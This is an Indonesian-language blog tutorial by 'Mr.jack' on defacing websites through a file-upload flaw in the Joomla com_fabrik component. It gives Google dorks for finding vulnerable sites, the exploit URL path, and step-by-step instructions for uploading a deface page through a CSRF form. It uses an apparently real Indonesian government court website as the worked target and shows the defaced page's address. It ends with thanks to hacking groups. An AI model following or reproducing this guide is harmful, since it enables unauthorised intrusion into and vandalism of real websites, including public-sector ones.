CARA DEFACE COM_FABRIK

Assalamualaikum... ketemu dengan saya Mr.jack

kali ini saya akan share cara deface dengan Com_Fabrik..
Ok gak usah lama lama kita langsung siapkan bahan bahan nya
##==================================#============#

#Csrf
(Link nya Link nya)
# sc deface
#rokok & kopi (biar gak tegang)
# Dork : inurl:index.php?option=com_fabrik
             inurl:index.php/component/fabrik/ site:.dk
             inurl:index.php?option=com_fabrik&view= site:
             inurl:importcsv.php site:
             inurl:viewTable?cid= site:com
Kembangin dork nya biar dapet yang fresh

# Exsploit : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
=#==============================================#=
1.Ok tahap pertama kita pastekan dork nya di google saya menggunakan dork :
inurl:index.php?option=com_fabrik&view= site: go.id

2.pilih salah satu web saya kali ini memilih web : http://www.pn-jeneponto.go.id
3. Masuk kan Exsploit di blakang url
Contoh : http://www.pn-jeneponto.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Kalo vuln akan ada tulisan kaya gambar di bawah ini : 

4.langsung aja copy semua url web+ Exsploit nya tadi ke csrf 
Contoh gambar:

5. Kalo dah di edit save csrf nya trus akses di google terserah pakai chrome / firefox

Gambar Csrf nya yang sudah saya akses :

 6.kalo dah masuk ke CSRF tinggal upload Sc kalian 
7.kalo dah kamu hamili trus akan ada tulisan seperti gambar di bawah ini:
8.Proses upload dah selsai tinggal akses Sc deface mu dengan mengetik di tab baru : 


http:// nama web.com//nama sc mu.html
Contoh : 
http://www.pn-jeneponto.go.id//Default.htm

9.ini contoh hasil deface saya



Ok sekian dari saya Mr.jack Selamat mencoba:-)

Tanks to  ALL MEMBER GRUP = Xendai Cyber Team, JaVa CyBeR T34M ,The Legend Anonymous Indo , Sunda Cyber Army 







Juga trimakasih kepeda Temen saya = Scary_Id 

Assalamualaikum wr.wb selamat ketemu di lain tutor  

Komentar

Posting Komentar

Postingan populer dari blog ini

Kumpulan Dork Sql Injection

Cara Membuat Script Deface